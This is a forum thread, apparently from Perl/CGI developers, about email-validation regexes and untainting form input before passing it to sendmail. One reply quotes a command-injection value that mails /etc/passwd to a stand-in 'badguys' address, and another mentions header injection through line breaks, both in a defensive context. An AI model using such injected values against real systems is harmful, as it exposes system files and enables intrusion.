Just wondering....what is the best and most accurate email matching regular expression that you guys use. Each different script and book I read uses a different one, so I just wanted to ask some of you guys what you use.

Just put the Email::Valid Module in your cgi-bin directory if your ISP doesn't want to install it. You can use any 'pure Perl'-Modules by putting them in your scripts directory. You can get the module from CPAN.

E-mail can't be matched. Well, you can use jasmines regexp. the poblem is that there doesn't even need to be a @ in it. You can have a e-mail like "Fred-&-Barney"@gfd.com

Hoever. For external e-mail addresses a @ is used to separate the mailbox and domain name. You can simply validate something like

Code

if( $emial =~ m[^(.+)@(.+)\.(.+)$] )

I never validate more then this.

to be really sure, you need to send a e-mail to that address, containing instructions how to proceed further. As long as the user hasn't done that, your script should mark the e-mail address as invalid, or something else.

I'm validating for security reasons. The e-mail address will be passed through the shell to sendmail. I need to untaint it with a regex so a user can't enter ; mail cracker@badguys.net </etc/passwdand retrieve the password file.

Yeah, a "word character" \w is [a-zA-Z0-9_] That never was the exact character class I wanted.

What I'm doing is receiving form input from a text box, saving it to a database, and subsequently using it in the TO: field for SendMail. I can't send whatever the user enters through the shell until I've verified that it's just an e-mail address. I don't care if it is a bad address. I handle that problem within the script. I just need to make sure I'm not sending some cracker's attempt to break into the server.

>> If you can't control it, improve it, correlate it or disseminate it with PERL, it doesn't exist!

Here are some notes / tips: - make sure you're sending the email only IF the request_type is POST. Otherwise someone can bookmark the page. - you can test something with domains maybe (if the mailfrom is called from a valid domain) - make sure there are no line breaks in the e-mail / subject fields. You can place more SMTP header tags after it. I always test that in my mailform script.

Oh I forgot- Never code the e-mail address you're sending to in the HTML code. Use a alias in stead. You convert that alias into the real e-mail address using a hash.